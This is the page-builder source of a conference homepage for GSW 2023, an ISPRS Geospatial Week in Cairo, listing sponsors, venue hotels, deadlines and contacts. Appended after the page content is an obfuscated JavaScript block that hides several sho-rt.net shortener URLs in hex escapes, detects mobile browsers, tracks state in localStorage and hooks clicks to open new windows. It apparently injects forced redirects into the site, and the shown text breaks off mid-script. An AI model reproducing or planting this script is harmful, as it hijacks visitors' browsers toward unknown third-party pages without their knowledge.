src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 